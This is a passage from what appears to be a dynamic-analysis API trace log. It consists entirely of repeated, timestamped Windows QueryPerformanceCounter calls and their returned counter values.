lpPerformanceCount=0x6adfdfc*=3097485360622) returned 1 [0156.035] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097485375235) returned 1 [0156.051] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097486959932) returned 1 [0156.051] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097486973976) returned 1 [0156.070] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097488898685) returned 1 [0156.070] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097488912711) returned 1 [0156.085] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097490359485) returned 1 [0156.085] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097490373409) returned 1 [0156.101] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097491965965) returned 1 [0156.101] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097491985336) returned 1 [0156.117] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097493565196) returned 1 [0156.117] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097493582549) returned 1 [0156.133] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097495166149) returned 1 [0156.133] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097495184955) returned 1 [0156.149] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097496762159) returned 1 [0156.149] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097496780466) returned 1 [0156.165] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097498371294) returned 1 [0156.165] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097498391511) returned 1 [0156.182] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097500058393) returned 1 [0156.182] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097500076915) returned 1 [0156.197] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097501602839) returned 1 [0156.197] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097501629235) returned 1 [0156.214] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097503303955) returned 1 [0156.214] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097503328475) returned 1 [0156.229] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097504764561) returned 1 [0156.229] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097504783360) returned 1 [0156.245] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097506365497) returned 1 [0156.245] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097506382250) returned 1 [0156.261] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097507970418) returned 1 [0156.261] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097507995039) returned 1 [0156.277] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097509563975) returned 1 [0156.277] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097509580435) returned 1 [0156.293] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097511165978) returned 1 [0156.293] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097511182694) returned 1 [0156.309] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097512774150) returned 1 [0156.309] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097512797269) returned 1 [0156.325] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097514364690) returned 1 [0156.325] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097514382068) returned 1 [0156.341] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097515990119) returned 1 [0156.341] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097516007454) returned 1 [0156.357] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097517564595) returned 1 [0156.357] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097517584527) returned 1 [0156.373] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097519175634) returned 1 [0156.373] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097519200100) returned 1 [0156.389] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097520766264) returned 1 [0156.389] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097520784210) returned 1 [0156.405] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097522370031) returned 1 [0156.405] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097522400976) returned 1 [0156.421] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097523965050) returned 1 [0156.421] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097523983150) returned 1 [0156.437] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097525565729) returned 1 [0156.437] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097525583239) returned 1 [0156.453] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097527166009) returned 1 [0156.453] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097527182930) returned 1 [0156.470] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097529034794) returned 1 [0156.472] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097529066645) returned 1 [0156.485] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097530364867) returned 1 [0156.485] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097530382241) returned 1 [0156.500] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097531939686) returned 1 [0156.501] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097531964070) returned 1 [0156.516] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097533533755) returned 1 [0156.516] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097533550598) returned 1 [0156.532] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097535140143) returned 1 [0156.533] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097535162555) returned 1 [0156.549] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097536756241) returned 1 [0156.549] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097536772721) returned 1 [0156.564] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097538304438) returned 1 [0156.564] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097538320259) returned 1 [0156.580] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097539914598) returned 1 [0156.580] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097539936735) returned 1 [0156.596] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097541505761) returned 1 [0156.596] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097541522787) returned 1 [0156.612] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097543114019) returned 1 [0156.612] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097543138121) returned 1 [0156.628] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097544709852) returned 1 [0156.628] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097544727387) returned 1 [0156.644] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097546308125) returned 1 [0156.644] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097546326000) returned 1 [0156.660] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097547905479) returned 1 [0156.660] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097547922450) returned 1 [0156.676] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097549507191) returned 1 [0156.676] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097549526336) returned 1 [0156.692] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097551102857) returned 1 [0156.692] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097551119123) returned 1 [0156.708] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097552705160) returned 1 [0156.708] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097552722697) returned 1 [0156.724] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097554301210) returned 1 [0156.724] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097554314520) returned 1 [0156.740] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097555902087) returned 1 [0156.740] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097555916814) returned 1 [0156.756] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097557498101) returned 1 [0156.756] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097557511346) returned 1 [0156.772] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097559101199) returned 1 [0156.772] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097559115738) returned 1 [0156.788] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097560702272) returned 1 [0156.788] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097560715793) returned 1 [0156.804] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097562302405) returned 1 [0156.804] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097562316071) returned 1 [0156.820] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097563898911) returned 1 [0156.820] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097563914531) returned 1 [0156.836] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097565504799) returned 1 [0156.836] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097565523243) returned 1 [0156.852] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097567107884) returned 1 [0156.852] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097567122390) returned 1 [0156.868] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097568709044) returned 1 [0156.868] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097568724297) returned 1 [0156.884] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097570305008) returned 1 [0156.884] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097570320334) returned 1 [0156.900] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097571903527) returned 1 [0156.900] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097571918372) returned 1 [0157.009] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097582850083) returned 1 [0157.010] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097582889092) returned 1 [0157.010] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097582944131) returned 1 [0157.011] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097582967151) returned 1 [0157.015] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097583456161) returned 1 [0157.016] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097583488711) returned 1 [0157.032] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097585063257) returned 1 [0157.032] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097585106076) returned 1 [0157.047] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097586651382) returned 1 [0157.048] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097586666778) returned 1 [0157.068] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097588703150) returned 1 [0157.068] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097588716899) returned 1 [0157.084] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097590337076) returned 1 [0157.084] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097590351763) returned 1 [0157.098] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097591706141) returned 1 [0157.098] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097591748543) returned 1 [0157.114] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097593310826) returned 1 [0157.114] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097593333914) returned 1 [0157.130] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097594906358) returned 1 [0157.130] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097594924467) returned 1 [0157.146] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097596505644) returned 1 [0157.146] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097596523565) returned 1 [0157.162] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097598104239) returned 1 [0157.162] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097598121896) returned 1 [0157.178] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097599718683) returned 1 [0157.178] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097599749763) returned 1 [0157.194] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097601305015) returned 1 [0157.194] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097601322603) returned 1 [0157.210] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097602907966) returned 1 [0157.210] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097602930848) returned 1 [0157.226] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097604506390) returned 1 [0157.226] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097604524261) returned 1 [0157.242] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097606115013) returned 1 [0157.242] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097606141462) returned 1 [0157.258] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097607709235) returned 1 [0157.258] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097607726131) returned 1 [0157.274] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097609299362) returned 1 [0157.274] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097609312777) returned 1 [0157.290] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097610902335) returned 1 [0157.290] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097610916321) returned 1 [0157.306] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097612500113) returned 1 [0157.306] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097612515658) returned 1 [0157.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097614102047) returned 1 [0157.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097614116120) returned 1 [0157.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097615703869) returned 1 [0157.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097615721344) returned 1 [0157.354] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097617309702) returned 1 [0157.354] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097617323808) returned 1 [0157.371] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097618992795) returned 1 [0157.371] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097619010083) returned 1 [0157.386] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097620551827) returned 1 [0157.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097620565809) returned 1 [0157.402] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097622148741) returned 1 [0157.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097622164292) returned 1 [0157.418] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097623749260) returned 1 [0157.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097623762613) returned 1 [0157.442] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097626150225) returned 1 [0157.443] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097626169068) returned 1 [0157.458] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097627686055) returned 1 [0157.458] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097627703002) returned 1 [0157.474] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097629286757) returned 1 [0157.474] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097629305212) returned 1 [0157.490] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097630884178) returned 1 [0157.490] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097630901210) returned 1 [0157.506] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097632484639) returned 1 [0157.506] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097632501639) returned 1 [0157.522] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097634084059) returned 1 [0157.522] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097634099864) returned 1 [0157.538] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097635688452) returned 1 [0157.538] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097635707091) returned 1 [0157.555] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097637400221) returned 1 [0157.555] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097637424974) returned 1 [0157.572] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097639137681) returned 1 [0157.572] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097639153493) returned 1 [0157.587] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097640585794) returned 1 [0157.587] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097640611535) returned 1 [0157.603] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097642196663) returned 1 [0157.603] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097642222395) returned 1 [0157.619] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097643791146) returned 1 [0157.619] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097643820494) returned 1 [0157.635] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097645389244) returned 1 [0157.635] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097645410334) returned 1 [0157.651] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097646989166) returned 1 [0157.651] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097647012471) returned 1 [0157.667] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097648584806) returned 1 [0157.667] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097648605511) returned 1 [0157.683] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097650188404) returned 1 [0157.683] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097650213809) returned 1 [0157.699] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097651790290) returned 1 [0157.699] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097651815239) returned 1 [0157.715] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097653384997) returned 1 [0157.715] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097653401150) returned 1 [0157.731] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097654990003) returned 1 [0157.731] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097655024975) returned 1 [0157.747] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097656592132) returned 1 [0157.747] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097656632293) returned 1 [0157.763] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097658187690) returned 1 [0157.763] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097658209780) returned 1 [0157.779] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 